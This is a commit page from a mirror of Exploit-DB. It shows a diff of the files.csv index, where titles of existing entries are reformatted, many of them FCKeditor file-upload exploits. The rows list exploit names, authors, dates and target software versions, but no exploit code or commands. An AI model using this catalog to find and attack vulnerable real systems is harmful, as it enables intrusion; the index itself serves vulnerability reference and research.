bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-07-30

Browse source 
4 new exploits
This commit is contained in:
Offensive Security 2015-07-30 05:02:27 +00:00
parent 7c8d57574c
commit 95ce541193
30 changed files with 2652 additions and 2176 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

100
files.csv
View file

@ -1226,7 +1226,7 @@ id,file,description,date,author,platform,type,port
1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0
1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 (connector.php) - Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0
1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532
1487,platforms/linux/remote/1487.c,"OpenVMPSd <= 1.3 - Remote Format String Exploit (Multiple Targets)",2006-02-10,"Gotfault Security",linux,remote,1589
@ -1671,7 +1671,7 @@ id,file,description,date,author,platform,type,port
1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) Remote SQL Injection Vulnerability",2006-06-28,KeyCoder,php,webapps,0
1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
@ -1740,7 +1740,7 @@ id,file,description,date,author,platform,type,port
2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0
2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 - (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability",2006-07-18,FarhadKey,php,webapps,0
2037,platforms/windows/dos/2037.c,"Dumb <= 0.9.3 (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0
2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0
@ -2394,7 +2394,7 @@ id,file,description,date,author,platform,type,port
2702,platforms/php/webapps/2702.php,"Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit",2006-11-02,Kacper,php,webapps,0
2703,platforms/php/webapps/2703.txt,"Article System 0.6 (volume.php) Remote File Include Vulnerability",2006-11-02,GregStar,php,webapps,0
2704,platforms/php/webapps/2704.txt,"freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0
2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 - (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0
2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0
2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0
@ -5241,7 +5241,7 @@ id,file,description,date,author,platform,type,port
5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0
5616,platforms/php/webapps/5616.txt,"ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0
5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) - Insecure Cookie Handling Vuln",2008-05-14,t0pP8uZz,php,webapps,0
5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 - (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
@ -5310,16 +5310,16 @@ id,file,description,date,author,platform,type,port
5684,platforms/php/webapps/5684.txt,"Joomla Component Artist (idgalery) SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0
5685,platforms/php/webapps/5685.txt,"FlashBlog (articulo_id) Remote SQL Injection Vulnerability",2008-05-28,HER0,php,webapps,0
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0
5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability",2008-05-29,QTRinux,php,webapps,0
5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (win)",2008-05-29,gmda,php,webapps,0
5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0
5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0
5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623
5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800
5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d Remote SQL Injection Exploit",2008-05-29,Stack,php,webapps,0
5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5698,platforms/php/webapps/5698.txt,"HiveMaker Professional <= 1.0.2 (cid) SQL Injection Vulnerability",2008-05-30,K-159,php,webapps,0
5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 - Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0
5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0
@ -5390,7 +5390,7 @@ id,file,description,date,author,platform,type,port
5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0
5768,platforms/php/webapps/5768.txt,"pNews 2.08 (shownews) Remote SQL Injection Vulnerability",2008-06-09,Cr@zy_King,php,webapps,0
5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0
5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
5771,platforms/php/webapps/5771.txt,"ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0
5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability",2008-06-10,Unohope,php,webapps,0
5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 (xss/SQL) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0
@ -5463,7 +5463,7 @@ id,file,description,date,author,platform,type,port
5841,platforms/php/webapps/5841.txt,"ThaiQuickCart (sLanguage) Local File Inclusion Vulnerability",2008-06-17,"CWH Underground",php,webapps,0
5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 (index.php page) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
5843,platforms/windows/dos/5843.html,"P2P Foxy Out of Memory Denial of Service Exploit",2008-06-17,Styxosaurus,windows,dos,0
5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 Final Insecure Cookie Handling Vulnerability",2008-06-17,Stack,php,webapps,0
5846,platforms/php/webapps/5846.txt,"eroCMS <= 1.4 (index.php site) SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability",2008-06-17,Cr@zy_King,php,webapps,0
@ -5525,7 +5525,7 @@ id,file,description,date,author,platform,type,port
5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 (header.php) Local File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - (LFI/XSS) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0
5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 (index.php go) Remote SQL Injection Vulnerability",2008-06-23,SxCx,php,webapps,0
5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Remote Privilege Escalation Exploit",2008-06-23,Cod3rZ,php,webapps,0
5910,platforms/php/webapps/5910.txt,"Ready2Edit (pages.php menuid) Remote SQL Injection Vulnerability",2008-06-23,Mr.SQL,php,webapps,0
@ -5540,8 +5540,8 @@ id,file,description,date,author,platform,type,port
5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - (LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 (rfi/lfi/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 (mod_root) Remote File Inclusion Vulnerability",2008-06-23,CraCkEr,php,webapps,0
5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems <= 3.0 (listing_id) SQL Injection Vuln",2008-06-24,K-159,php,webapps,0
5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple Remote SQL Injection Vulnerabilities",2008-06-24,"CWH Underground",php,webapps,0
5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0
@ -5562,7 +5562,7 @@ id,file,description,date,author,platform,type,port
5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 (sql/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability",2008-06-26,boom3rang,php,webapps,0
5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 - (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 (riddleid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 (tipid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
@ -5620,7 +5620,7 @@ id,file,description,date,author,platform,type,port
6002,platforms/php/webapps/6002.pl,"Joomla Component altas 1.0 - Multiple Remote SQL Injection Exploit",2008-07-04,Houssamix,php,webapps,0
6003,platforms/php/webapps/6003.txt,"Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability",2008-07-04,SsEs,php,webapps,0
6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote BoF Exploit",2008-07-04,"Karol Wiesek",windows,remote,0
6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 - (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities Exploit",2008-07-05,BlackH,php,webapps,0
6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (LFI/XSS) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0
6008,platforms/php/webapps/6008.php,"ImperialBB <= 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0
@ -5927,7 +5927,7 @@ id,file,description,date,author,platform,type,port
6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 (item.php id) Remote SQL Injection Vulnerability",2008-09-01,Stack,php,webapps,0
6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability",2008-09-01,e.wiZz!,php,webapps,0
6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) Remote SQL Injection Vulnerability",2008-09-01,"BorN To K!LL",php,webapps,0
6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
6345,platforms/windows/dos/6345.html,"VMware COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0
6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 (uid) SQL Injection Exploit",2008-09-01,"Virangar Security",php,webapps,0
6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability",2008-09-02,MustLive,php,webapps,0
@ -5941,7 +5941,7 @@ id,file,description,date,author,platform,type,port
6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0
6356,platforms/php/webapps/6356.php,"Moodle <= 1.8.4 - Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0
6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 (upload/sql/XSS) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0
6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
6361,platforms/php/webapps/6361.txt,"Living Local Website (listtest.php r) SQL Injection Vulnerability",2008-09-03,"Hussin X",php,webapps,0
6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability",2008-09-04,"Hussin X",php,webapps,0
6363,platforms/php/webapps/6363.txt,"qwicsite pro (sql/XSS) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0
@ -5987,14 +5987,14 @@ id,file,description,date,author,platform,type,port
6407,platforms/windows/remote/6407.c,"Microworld Mailscan 5.6.a Password Reveal Exploit",2008-09-09,SlaYeR,windows,remote,0
6408,platforms/php/webapps/6408.txt,"CMS Buzz (id) Remote SQL Injection Vulnerability",2008-09-09,"security fears team",php,webapps,0
6409,platforms/php/webapps/6409.txt,"Availscript Article Script (articles.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
6411,platforms/php/webapps/6411.txt,"Availscript Photo Album (pics.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
6412,platforms/php/webapps/6412.txt,"Availscript Classmate Script (viewprofile.php) SQL Injection Vulnerability",2008-09-09,Stack,php,webapps,0
6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion Vulnerabilities",2008-09-10,SirGod,php,webapps,0
6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 (PAWWeb11.ocx) ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0
6416,platforms/php/webapps/6416.txt,"Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit",2008-09-10,StAkeR,php,webapps,0
6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script (jid) SQL Injection Vulnerability (auth)",2008-09-10,InjEctOr5,php,webapps,0
6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite / Jaw Portal free (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
6422,platforms/php/webapps/6422.txt,"phpvid 1.1 (xss/SQL) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0
@ -6021,7 +6021,7 @@ id,file,description,date,author,platform,type,port
6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 (register.php) Remote Arbitrary Add Editor Vulnerability",2008-09-12,mr.al7rbi,php,webapps,0
6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script <= 1.0 (cat_id) SQL Injection Vulnerability",2008-09-12,FIREH4CK3R,php,webapps,0
6447,platforms/php/webapps/6447.txt,"pNews 2.03 (newsid) Remote SQL Injection Vulnerability",2008-09-12,r45c4l,php,webapps,0
6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 - (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
6449,platforms/php/webapps/6449.php,"pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit",2008-09-13,Stack,php,webapps,0
6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0
6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion/PHPInfo Disclosure Vulns",2008-09-13,SirGod,php,webapps,0
@ -6143,7 +6143,7 @@ id,file,description,date,author,platform,type,port
6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX BoF Exploit (meta)",2008-09-25,"Kevin Finisterre",windows,remote,0
6571,platforms/php/webapps/6571.txt,"openengine <= 2.0 beta4 - Remote File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0
6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 (XSS/SQL) Remote Vulnerabilities",2008-09-25,d3v1l,php,webapps,0
6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit",2008-09-26,Stack,php,webapps,0
6575,platforms/php/webapps/6575.txt,"barcodegen <= 2.0.0 (class_dir) Remote File Inclusion Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0
6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 (Category) SQL Injection Vulnerability",2008-09-26,"CWH Underground",php,webapps,0
@ -6348,7 +6348,7 @@ id,file,description,date,author,platform,type,port
6780,platforms/php/webapps/6780.txt,"zeeproperty (adid) Remote SQL Injection Vulnerability",2008-10-18,"Hussin X",php,webapps,0
6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection Exploit",2008-10-18,Xianur0,php,webapps,0
6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit",2008-10-18,StAkeR,php,webapps,0
6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader <= 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0
6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability",2008-10-19,NoGe,php,webapps,0
6786,platforms/solaris/remote/6786.pl,"Solaris 9 [UltraSPARC] sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111
@ -6710,7 +6710,7 @@ id,file,description,date,author,platform,type,port
7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 (API_HOME_DIR) RFI Vulnerability",2008-11-18,"Ghost Hacker",php,webapps,0
7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 Insecure Cookie Handling Vulnerability",2008-11-18,x0r,php,webapps,0
7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Remote Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0
7160,platforms/php/webapps/7160.php,"MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0
7162,platforms/php/webapps/7162.pl,"MauryCMS <= 0.53.2 - Remote Shell Upload Exploit",2008-11-19,StAkeR,php,webapps,0
@ -7586,7 +7586,7 @@ id,file,description,date,author,platform,type,port
8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 Persistent XSS Vulnerability",2009-02-16,rAWjAW,php,webapps,0
8058,platforms/windows/dos/8058.pl,"TPTEST <= 3.1.7 - Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0
8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0
8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
8061,platforms/php/webapps/8061.pl,"simplePms CMS <= 0.1.4 - LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0
8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b (sql/XSS) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
8063,platforms/php/webapps/8063.txt,"novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
@ -10766,7 +10766,7 @@ id,file,description,date,author,platform,type,port
11768,platforms/php/webapps/11768.txt,"Newbie CMS File Disclosure Vulnerability",2010-03-15,JIKO,php,webapps,0
11769,platforms/hardware/dos/11769.py,"iPhone Springboard Malformed Character Crash PoC",2010-03-15,"Chase Higgins",hardware,dos,0
11770,platforms/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST DoS",2010-03-16,dmnt,linux,dos,21
11771,platforms/php/webapps/11771.txt,"osCMax 2.0 (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
11771,platforms/php/webapps/11771.txt,"osCMax 2.0 - (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
